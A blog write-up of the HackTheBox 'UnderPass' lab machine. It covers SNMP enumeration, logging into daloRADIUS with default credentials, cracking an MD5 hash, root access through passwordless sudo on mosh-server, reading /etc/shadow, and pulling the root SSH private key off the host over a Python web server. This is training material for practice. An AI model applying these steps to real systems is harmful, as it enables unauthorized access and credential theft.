### [HackTheBox | Underpass](https://croclius.com/hackthebox-underpass/) **Published:** May 10, 2025 **Author:** croclius **Content:** HackTheBox machine: https://www.hackthebox.com/machines/UnderPass ## Reconnaissance ### nmap/TCP `nmap` finds two open TCP ports, SSH (22) and HTTP (80): ```bash croc@hacker$ rustscan -a underpass.htb --ulimit 5000 -- -A -T5 -oA initial Nmap scan report for underpass.htb (10.10.11.48) Host is up, received conn-refused (0.30s latency). Scanned at 2024-12-25 01:14:10 EST for 19s PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 48:b0:d2:c7:29:26:ae:3d:fb:b7:6b:0f:f5:4d:2a:ea (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBK+kvbyNUglQLkP2Bp7QVhfp7EnRWMHVtM7xtxk34WU5s+lYksJ07/lmMpJN/bwey1SVpG0FAgL0C/+2r71XUEo= | 256 cb:61:64:b8:1b:1b:b5:ba:b8:45:86:c5:16:bb:e2:a2 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ8XNCLFSIxMNibmm+q7mFtNDYzoGAJ/vDNa6MUjfU91 80/tcp open http syn-ack Apache httpd 2.4.52 ((Ubuntu)) |_http-title: Apache2 Ubuntu Default Page: It works |_http-server-header: Apache/2.4.52 (Ubuntu) | http-methods: |_ Supported Methods: HEAD GET POST OPTIONS Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` Based on the [OpenSSH](https://packages.ubuntu.com/search?keywords=openssh-server) and [Apache](https://packages.ubuntu.com/search?suite=default§ion=all&arch=any&keywords=apache&searchon=names) versions, the host is likely running Ubuntu [jammy (22.04LTS)](https://packages.ubuntu.com/jammy/openssh-server). Without valid credentials, SSH is not a viable entry point. Therefore, the primary attack surface is HTTP, where an Apache2 web server is running with a default page. ### nmap/UDP I usually also kick off a `UDP` Scan alongside the `TCP` Scan. Since UDP scans can be slow, I limited the scan to the top 50 ports to reduce the time taken. `nmap` finds `SNMP` being open on port `161` which can be quite juicy! ```bash croc@hacker$ sudo nmap -sU --top-ports 50 -T3 -oN UDPScan underpass.htb Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-25 01:17 EST Nmap scan report for underpass.htb (10.10.11.48) Host is up (0.27s latency). PORT STATE SERVICE 161/udp open snmp Nmap done: 1 IP address (1 host up) scanned in 51.12 seconds ``` ### Website - 80/TCP #### Main Page We have an `apache` default web page as we have already seen that in our scan: #### Directory Busting Directory enumeration did not reveal any notable findings. Most of the found directories are `403` and `index.html` where we have a `200` is not an unusual thing for an Apache Web Server. ```bash croc@hacker$ gobuster dir -u http://underpass.htb -w /usr/share/wordlists/dirb/common.txt =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://underpass.htb [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/common.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /.hta (Status: 403) [Size: 278] /.htaccess (Status: 403) [Size: 278] /.htpasswd (Status: 403) [Size: 278] /index.html (Status: 200) [Size: 10671] /server-status (Status: 403) [Size: 278] Progress: 4614 / 4615 (99.98%) =============================================================== Finished =============================================================== ``` ### SNMP - 161/UDP With such a limited attack surface, it's worthwhile to explore UDP. #### Finding the Community String In order to interact with `SNMP`, a **community string** is required which functions as a password to authenticate us. It's really common to have a community string of `public` for stuff that is meant to be public & it's a good bet to start by guessing that. But, there's also a tool called `onesixtyone` built-in into kali which tries a bunch of common community strings against a host. Let's try running it: ```bash croc@hacker$ onesixtyone 10.10.11.48 -c /usr/share/doc/onesixtyone/dict.txt Scanning 1 hosts, 50 communities 10.10.11.48 [public] Linux underpass 5.15.0-126-generic 136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64 ``` Utilizing the list of common community strings provided with the tool, we found out that our target host is indeed using `public` as the community string. Another approach is to use the **Nmap Scripting Engine (NSE)** with the `snmp-brute` script to enumerate the community string. ```bash croc@hacker:~$ sudo nmap -sU -p 161 --script=snmp-brute --min-rate 500 underpass.htb Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-22 07:47 EST Nmap scan report for underpass.htb (10.10.11.48) Host is up (0.28s latency). PORT STATE SERVICE 161/udp open snmp | snmp-brute: |_ public - Valid credentials Nmap done: 1 IP address (1 host up) scanned in 12.86 seconds ``` #### snmpbulkwalk/snmpwalk We can utilize `snmpwalk` or `snmpbulkwalk` in order to enumerate SNMP. But before doing that, there's one more thing to look into. SNMP uses a [hierarchical numbering scheme](https://docs.oracle.com/cd/E13203_01/tuxedo/tux90/snmpmref/1tmib.htm "hierarchical numbering scheme") to label data it holds. There's an addon package that converts it into a more readable format. We can set it up by `apt install snmp-mibs-downloader` and commenting out the following line in `/etc/snmp/snmp.conf` file: Now, I used `snmpbulkwalk` to enumerate `snmp` using the community string of `public`. This revealed a username of `steve@underpass.htb` and the use of a `daloradius` server. ```bash croc@hacker$ snmpbulkwalk -c public -v2c underpass.htb SNMPv2-MIB::sysDescr.0 = STRING: Linux underpass 5.15.0-126-generic 136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64 SNMPv2-MIB::sysObjectID.0 = OID: NET-SNMP-MIB::netSnmpAgentOIDs.10 DISMAN-EVENT-MIB::sysUpTimeInstance = Timeticks: (285355) 0:47:33.55 SNMPv2-MIB::sysContact.0 = STRING: steve@underpass.htb SNMPv2-MIB::sysName.0 = STRING: UnDerPass.htb is the only daloradius server in the basin! SNMPv2-MIB::sysLocation.0 = STRING: Nevada, U.S.A. but not Vegas SNMPv2-MIB::sysServices.0 = INTEGER: 72 SNMPv2-MIB::sysORLastChange.0 = Timeticks: (5) 0:00:00.05 SNMPv2-MIB::sysORID.1 = OID: SNMP-FRAMEWORK-MIB::snmpFrameworkMIBCompliance SNMPv2-MIB::sysORID.2 = OID: SNMP-MPD-MIB::snmpMPDCompliance SNMPv2-MIB::sysORID.3 = OID: SNMP-USER-BASED-SM-MIB::usmMIBCompliance SNMPv2-MIB::sysORID.4 = OID: SNMPv2-MIB::snmpMIB SNMPv2-MIB::sysORID.5 = OID: SNMP-VIEW-BASED-ACM-MIB::vacmBasicGroup SNMPv2-MIB::sysORID.6 = OID: TCP-MIB::tcpMIB SNMPv2-MIB::sysORID.7 = OID: UDP-MIB::udpMIB SNMPv2-MIB::sysORID.8 = OID: IP-MIB::ip SNMPv2-MIB::sysORID.9 = OID: SNMP-NOTIFICATION-MIB::snmpNotifyFullCompliance SNMPv2-MIB::sysORID.10 = OID: NOTIFICATION-LOG-MIB::notificationLogMIB SNMPv2-MIB::sysORDescr.1 = STRING: The SNMP Management Architecture MIB. SNMPv2-MIB::sysORDescr.2 = STRING: The MIB for Message Processing and Dispatching. SNMPv2-MIB::sysORDescr.3 = STRING: The management information definitions for the SNMP User-based Security Model. SNMPv2-MIB::sysORDescr.4 = STRING: The MIB module for SNMPv2 entities SNMPv2-MIB::sysORDescr.5 = STRING: View-based Access Control Model for SNMP. SNMPv2-MIB::sysORDescr.6 = STRING: The MIB module for managing TCP implementations SNMPv2-MIB::sysORDescr.7 = STRING: The MIB module for managing UDP implementations SNMPv2-MIB::sysORDescr.8 = STRING: The MIB module for managing IP and ICMP implementations SNMPv2-MIB::sysORDescr.9 = STRING: The MIB modules for managing SNMP Notification, plus filtering. SNMPv2-MIB::sysORDescr.10 = STRING: The MIB module for logging SNMP Notifications. ``` #### snmp-check We can use `snmp-check` for that same purpose as well for more structured output: ```bash croc@hacker$ snmp-check -c public -v 2c 10.10.11.48 snmp-check v1.9 - SNMP enumerator Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org) [+] Try to connect to 10.10.11.48:161 using SNMPv2c and community 'public' [*] System information: Host IP address : 10.10.11.48 Hostname : UnDerPass.htb is the only daloradius server in the basin! Description : Linux underpass 5.15.0-126-generic 136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64 Contact : steve@underpass.htb Location : Nevada, U.S.A. but not Vegas Uptime snmp : 02:09:58.97 Uptime system : 02:09:45.95 System date : 2025-1-2 02:36:45.0 [*] Network information: Default TTL : noSuchObject TCP segments received : noSuchObject TCP segments sent : noSuchObject TCP segments retrans : noSuchObject Input datagrams : noSuchObject Delivered datagrams : noSuchObject Output datagrams : noSuchObject [*] File system information: Index : noSuchObject Mount point : noSuchObject Access : noSuchObject Bootable : noSuchObject ``` #### Now, what?? **[daloRADIUS](https://github.com/lirantal/daloradius/wiki)** is a web-based management interface for managing a RADIUS(Remote Authentication Dial-In User Service) Server but specifically it manages `FreeRADIUS` and it's database structure, a widely used open-source RADIUS Server. ### A Hunch, but Well-Thought #### /daloradius I got a `403 forbidden` which tells me that this is most probably the root directory for daloradius web application. #### Directory Brute Force Let's bust subdirectories for `/daloradius` and hope for the best: ```bash croc@hacker$ sudo feroxbuster -u http://underpass.htb/daloradius -w /usr/share/seclists/Discovery/Web-Content/big.txt ___ ___ __ __ __ __ __ ___ |__ |__ |__) |__) | / ` / _/ | | |__ | |___ | | | __, __/ / | |__/ |___ by Ben "epi" Risher πŸ€“ ver: 2.10.4 ───────────────────────────┬────────────────────── 🎯 Target Url β”‚ http://underpass.htb/daloradius πŸš€ Threads β”‚ 50 πŸ“– Wordlist β”‚ /usr/share/seclists/Discovery/Web-Content/big.txt πŸ‘Œ Status Codes β”‚ All Status Codes! πŸ’₯ Timeout (secs) β”‚ 7 🦑 User-Agent β”‚ feroxbuster/2.10.4 πŸ’‰ Config File β”‚ /etc/feroxbuster/ferox-config.toml πŸ”Ž Extract Links β”‚ true 🏁 HTTP methods β”‚ [GET] πŸ”ƒ Recursion Depth β”‚ 4 πŸŽ‰ New Version Available β”‚ https://github.com/epi052/feroxbuster/releases/latest ───────────────────────────┴────────────────────── 🏁 Press [ENTER] to use the Scan Management Menuβ„’ ────────────────────────────────────────────────── 403 GET 9l 28w 278c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter 404 GET 9l 31w 275c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter 301 GET 9l 28w 319c http://underpass.htb/daloradius => http://underpass.htb/daloradius/ 200 GET 412l 3898w 24703c http://underpass.htb/daloradius/ChangeLog 200 GET 340l 2968w 18011c http://underpass.htb/daloradius/LICENSE 301 GET 9l 28w 323c http://underpass.htb/daloradius/app => http://underpass.htb/daloradius/app/ 301 GET 9l 28w 327c http://underpass.htb/daloradius/contrib => http://underpass.htb/daloradius/contrib/ 301 GET 9l 28w 323c http://underpass.htb/daloradius/doc => http://underpass.htb/daloradius/doc/ 301 GET 9l 28w 330c http://underpass.htb/daloradius/app/common => http://underpass.htb/daloradius/app/common/ 301 GET 9l 28w 330c http://underpass.htb/daloradius/contrib/db => http://underpass.htb/daloradius/contrib/db/ 301 GET 9l 28w 327c http://underpass.htb/daloradius/library => http://underpass.htb/daloradius/library/ 301 GET 9l 28w 325c http://underpass.htb/daloradius/setup => http://underpass.htb/daloradius/setup/ 301 GET 9l 28w 331c http://underpass.htb/daloradius/doc/install => http://underpass.htb/daloradius/doc/install/ 301 GET 9l 28w 333c http://underpass.htb/daloradius/app/operators => http://underpass.htb/daloradius/app/operators/ 301 GET 9l 28w 339c http://underpass.htb/daloradius/app/common/includes => http://underpass.htb/daloradius/app/common/includes/ 301 GET 9l 28w 338c http://underpass.htb/daloradius/app/common/library => http://underpass.htb/daloradius/app/common/library/ 301 GET 9l 28w 335c http://underpass.htb/daloradius/contrib/scripts => http://underpass.htb/daloradius/contrib/scripts/ 301 GET 9l 28w 340c http://underpass.htb/daloradius/app/common/templates => http://underpass.htb/daloradius/app/common/templates/ 301 GET 9l 28w 341c http://underpass.htb/daloradius/app/operators/include => http://underpass.htb/daloradius/app/operators/include/ 301 GET 9l 28w 338c http://underpass.htb/daloradius/app/operators/lang => http://underpass.htb/daloradius/app/operators/lang/ 301 GET 9l 28w 341c http://underpass.htb/daloradius/app/operators/library => http://underpass.htb/daloradius/app/operators/library/ 301 GET 9l 28w 347c http://underpass.htb/daloradius/app/operators/notifications => http://underpass.htb/daloradius/app/operators/notifications/ 301 GET 9l 28w 348c http://underpass.htb/daloradius/app/operators/include/common => http://underpass.htb/daloradius/app/operators/include/common/ 301 GET 9l 28w 348c http://underpass.htb/daloradius/app/operators/include/config => http://underpass.htb/daloradius/app/operators/include/config/ 301 GET 9l 28w 347c http://underpass.htb/daloradius/contrib/scripts/maintenance => http://underpass.htb/daloradius/contrib/scripts/maintenance/ 301 GET 9l 28w 340c http://underpass.htb/daloradius/app/operators/static => http://underpass.htb/daloradius/app/operators/static/ 301 GET 9l 28w 352c http://underpass.htb/daloradius/app/operators/library/extensions => http://underpass.htb/daloradius/app/operators/library/extensions/ 301 GET 9l 28w 352c http://underpass.htb/daloradius/app/operators/include/management => http://underpass.htb/daloradius/app/operators/include/management/ 301 GET 9l 28w 346c http://underpass.htb/daloradius/app/operators/include/menu => http://underpass.htb/daloradius/app/operators/include/menu/ 301 GET 9l 28w 344c http://underpass.htb/daloradius/app/operators/static/css => http://underpass.htb/daloradius/app/operators/static/css/ 301 GET 9l 28w 355c http://underpass.htb/daloradius/contrib/scripts/maintenance/monitor => http://underpass.htb/daloradius/contrib/scripts/maintenance/monitor/ 301 GET 9l 28w 347c http://underpass.htb/daloradius/app/operators/static/images => http://underpass.htb/daloradius/app/operators/static/images/ 301 GET 9l 28w 348c http://underpass.htb/daloradius/app/operators/library/tables => http://underpass.htb/daloradius/app/operators/library/tables/ 301 GET 9l 28w 357c http://underpass.htb/daloradius/app/operators/notifications/templates => http://underpass.htb/daloradius/app/operators/notifications/templates/ [####################] - 24m 409646/409646 0s found:32 errors:66265 [####################] - 8m 20477/20477 41/s http://underpass.htb/daloradius/ [####################] - 10m 20477/20477 35/s http://underpass.htb/daloradius/app/ [####################] - 9m 20477/20477 37/s http://underpass.htb/daloradius/contrib/ [####################] - 10m 20477/20477 36/s http://underpass.htb/daloradius/doc/ [####################] - 10m 20477/20477 33/s http://underpass.htb/daloradius/app/common/ [####################] - 10m 20477/20477 33/s http://underpass.htb/daloradius/contrib/db/ [####################] - 11m 20477/20477 31/s http://underpass.htb/daloradius/library/ [####################] - 11m 20477/20477 31/s http://underpass.htb/daloradius/setup/ [####################] - 13m 20477/20477 26/s http://underpass.htb/daloradius/app/operators/ [####################] - 12m 20477/20477 28/s http://underpass.htb/daloradius/doc/install/ [####################] - 13m 20477/20477 26/s http://underpass.htb/daloradius/app/common/includes/ [####################] - 12m 20477/20477 28/s http://underpass.htb/daloradius/app/common/library/ [####################] - 13m 20477/20477 27/s http://underpass.htb/daloradius/contrib/scripts/ [####################] - 11m 20477/20477 30/s http://underpass.htb/daloradius/app/common/templates/ [####################] - 11m 20477/20477 30/s http://underpass.htb/daloradius/app/operators/include/ [####################] - 11m 20477/20477 32/s http://underpass.htb/daloradius/app/operators/lang/ [####################] - 11m 20477/20477 32/s http://underpass.htb/daloradius/app/operators/library/ ``` #### /app/operators Navigating to `/daloradius/app/operators`, I was redirected to the **daloradius login page**. Something that I want you to note here is the difference between the version of the application listed here on the login page and the `ChangeLog` entry below: Identifying the correct version is crucial while looking for exploits and CVEs. The version on the login page is certainly the most accurate in my opinion. However, it's not required for solving this box. #### Default Credentials Whenever I see a login page, my first go-to is **default credentials** as they're just too common. I found the following default credentials in the [GitHub Repo](https://github.com/lirantal/daloradius/wiki/Installing-daloRADIUS#:~:text=To%20log%20in%20to%20the%20RADIUS%20Management%20application%2C%20use%20the%20following%20default%20credentials: "GitHub Repo"): I tried the default credentials and it worked flawlessly: We have one user in the users list. I found a user named `svcMosh` with a what looks like a `MD5` hashed password. ## Shell as svcMosh ### Hash Cracking First of all, we must confirm the hash type using `hash-identifier`: As it is possibly a MD5, let's try to crack it: ```bash croc@hacker$ hashcat -m 0 svcmosh_hash.txt /usr/share/wordlists/rockyou.txt ``` Hurrah!! We successfully cracked the password! Have some dance lol! ### SSH With `ssh` being open and a pair of credentials, we can try to gain initial access: ```bash croc@hacker$ ssh svcMosh@10.10.11.48 svcMosh@10.10.11.48's password: Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-126-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/pro System information as of Wed Jan 1 04:31:04 PM UTC 2025 System load: 0.05 Processes: 230 Usage of /: 96.5% of 3.75GB Users logged in: 1 Memory usage: 17% IPv4 address for eth0: 10.10.11.48 Swap usage: 0% => / is using 96.5% of 3.75GB Expanded Security Maintenance for Applications is not enabled. 0 updates can be applied immediately. Enable ESM Apps to receive additional future security updates. See https://ubuntu.com/esm or run: sudo pro status The list of available updates is more than a week old. To check for new updates run: sudo apt update Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings Last login: Wed Jan 1 16:21:17 2025 from 10.10.16.17 svcMosh@underpass:~$ ``` Now, grab `user.txt`: ```bash svcMosh@underpass:~$ ls user.txt svcMosh@underpass:~$ cat user.txt 31955*************************** ``` ## Shell as Root ### Enumeration The first things that I am looking into after gaining a foothold on a linux box are quick wins like history where there may be a password, sudo permissions or SUID/SGID Binaries. #### Sudo Privileges I found that the user `svcMosh` has **passwordless sudo privileges** to execute the `/usr/bin/mosh-server` command as any user, including `root`. ```bash svcMosh@underpass:~$ sudo -l Matching Defaults entries for svcMosh on localhost: env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin, use_pty User svcMosh may run the following commands on localhost: (ALL) NOPASSWD: /usr/bin/mosh-server ``` #### Mosh Let's start by understanding mosh. In simple words, `mosh` is the modern replacement of `SSH`. Since `SSH` relies on the `TCP` protocol, which maintains a session bound to a specific IP address, it struggles with connectivity issues when switching networks or experiencing interruptions. Mosh addresses this limitation by using `UDP` and application-level sessions, ensuring a stable connection even during network changes. Normally, if we have the target user's password and mosh installed on the target device, we can just connect to it and it does everything for us. We can see this in action as well. Install `mosh` on your Kali Machine by `apt install mosh`. Then, we can just connect as the `svcMosh` user because we have his password. ```bash croc@hacker:~$ mosh svcMosh@10.10.11.48 The authenticity of host '10.10.11.48 ()' can't be established. ED25519 key fingerprint is SHA256:zrDqCvZoLSy6MxBOPcuEyN926YtFC94ZCJ5TWRS0VaM. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.10.11.48' (ED25519) to the list of known hosts. svcMosh@10.10.11.48's password: ``` What it will do is establish a session over SSH & run the `mosh-server` on the target. After the server starts, SSH disconnects, and the client switches to `UDP` for communication. So, we got a shell as `svcMosh` user. But in order to do this for the `root` user, we need to have his password which we don't have currently. So, we'll take a different route which is the manual way of doing it. ### Run the Mosh Server Manually run the `mosh-server` on the target box. It will connect to a high `UDP` port on the local machine. As soon as the client connects to this port, it executes the user's login shell. As we have `sudo` permissions over `mosh-server`, we can expect to get a shell as root user. ```bash svcMosh@underpass:~$ sudo mosh-server MOSH CONNECT 60001 6odTyvz2KOIVZuV8fym5uw mosh-server (mosh 1.3.2) [build mosh 1.3.2] Copyright 2012 Keith Winstein License GPLv3+: GNU GPL version 3 or later . This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. [mosh-server detached, pid = 1359] ``` If you want to, you can also specify a port of your own choice using the `new` argument: ```bash svcMosh@underpass:~$ sudo mosh-server new -p 9005 MOSH CONNECT 9005 +4f+MTlmKWXtgliNPRoexA mosh-server (mosh 1.3.2) [build mosh 1.3.2] Copyright 2012 Keith Winstein License GPLv3+: GNU GPL version 3 or later . This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. [mosh-server detached, pid = 1498] ``` ### Connect through Mosh Client `6odTyvz2KOIVZuV8fym5uw` is our base64-encoded cryptographic key while `60001` is the port. ```bash svcMosh@underpass:~$ MOSH_KEY=6odTyvz2KOIVZuV8fym5uw mosh-client 127.0.0.1 60001 ``` And, we got root! Congratulations(to me of course πŸ˜‚)! ### Time-sensitive Connection Requirement Now, make sure that you connect to the `mosh-server` within 60 seconds of running it. Otherwise, the server will go down automatically & you will see the following error while connecting using `mosh-client`: ### root.txt ```bash root@underpass:~# ls root.txt root@underpass:~# cat root.txt 8fff7*************************** ``` ## Post Root We got the root flag but the shell is really unstable as I am not even able to scroll up. Let's look for other ways! ### Failed Attempt #### Cracking the Root Hash We have read access to the `/etc/shadow` so I thought to try cracking the root hash.(Although that proved to be a dumb idea!) ```bash root@underpass:~# head -n 4 /etc/shadow root:$y$j9T$y6GVl9yuguP9lhnKmS04c.$pzmkCXRNa/BCrMpnOUxIWUbVR905YSEHwW20O40wEaA:20057:0:99999:7::: daemon:*:19103:0:99999:7:::/cod bin:*:19103:0:99999:7::: sys:*:19103:0:99999:7::: ``` The `$y$` specifies the **[Yescrypt](https://www.openwall.com/yescrypt/) algorithm** which is an advanced hashing algorithm designed to provide enhanced security and performance. `Hashcat` doesn't support `yescrypt` so, I used `john` to crack this hash. However, this was going extremely slow so I aborted the session. ```bash croc@hacker$ john --format=crypt --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt Using default input encoding: UTF-8 Loaded 2 password hashes with 2 different salts (crypt, generic crypt(3) [?/64]) Remaining 1 password hash Cost 1 (algorithm [1:descrypt 2:md5crypt 3:sunmd5 4:bcrypt 5:sha256crypt 6:sha512crypt]) is 0 for all loaded hashes Cost 2 (algorithm specific iterations) is 1 for all loaded hashes Will run 3 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status 0g 0:00:00:08 0.00% (ETA: 2025-01-05 10:33) 0g/s 66.28p/s 66.28c/s 66.28C/s evelyn..kelly 0g 0:00:09:51 0.24% (ETA: 2025-01-05 18:40) 0g/s 71.06p/s 71.06c/s 71.06C/s iloveabby..dragon23 0g 0:00:17:57 0.46% (ETA: 2025-01-05 16:20) 0g/s 73.24p/s 73.24c/s 73.24C/s ilovenicky..harekrishna 0g 0:00:20:14 0.54% (ETA: 2025-01-05 14:08) 0g/s 75.65p/s 75.65c/s 75.65C/s peaches15..ninety 0g 0:00:29:23 0.75% (ETA: 2025-01-05 16:50) 0g/s 72.24p/s 72.24c/s 72.24C/s 190203..151718 0g 0:00:29:25 0.75% (ETA: 2025-01-05 16:48) 0g/s 72.26p/s 72.26c/s 72.26C/s 130303..12041986 Session aborted ``` ### SSH Private Key #### id\_rsa I found a ssh `id_rsa` private key in the `/root/.ssh` directory and I copied it to the current directory. Next, I spined up a python web server in the same directory: ```bash root@underpass:~# find / -name id_rsa 2> /dev/null /home/svcMosh/.ssh/id_rsa /root/.ssh/id_rsa root@underpass:~# cp /root/.ssh/id_rsa . root@underpass:~# ls id_rsa root.txt root@underpass:~# python3 -m http.server Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... ``` I transferred it to my own machine: ### Shell Access via SSH ```bash croc@hacker$ sudo ssh -i id_rsa root@10.10.11.48 Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-126-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/pro System information as of Fri Jan 3 04:32:04 AM UTC 2025 System load: 0.05 Processes: 233 Usage of /: 85.7% of 3.75GB Users logged in: 2 Memory usage: 15% IPv4 address for eth0: 10.10.11.48 Swap usage: 0% => / is using 85.7% of 3.75GB Expanded Security Maintenance for Applications is not enabled. 0 updates can be applied immediately. Enable ESM Apps to receive additional future security updates. See https://ubuntu.com/esm or run: sudo pro status The list of available updates is more than a week old. To check for new updates run: sudo apt update Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings Last login: Thu Dec 19 13:40:29 2024 root@underpass:~# ``` **Tags:** HackTheBox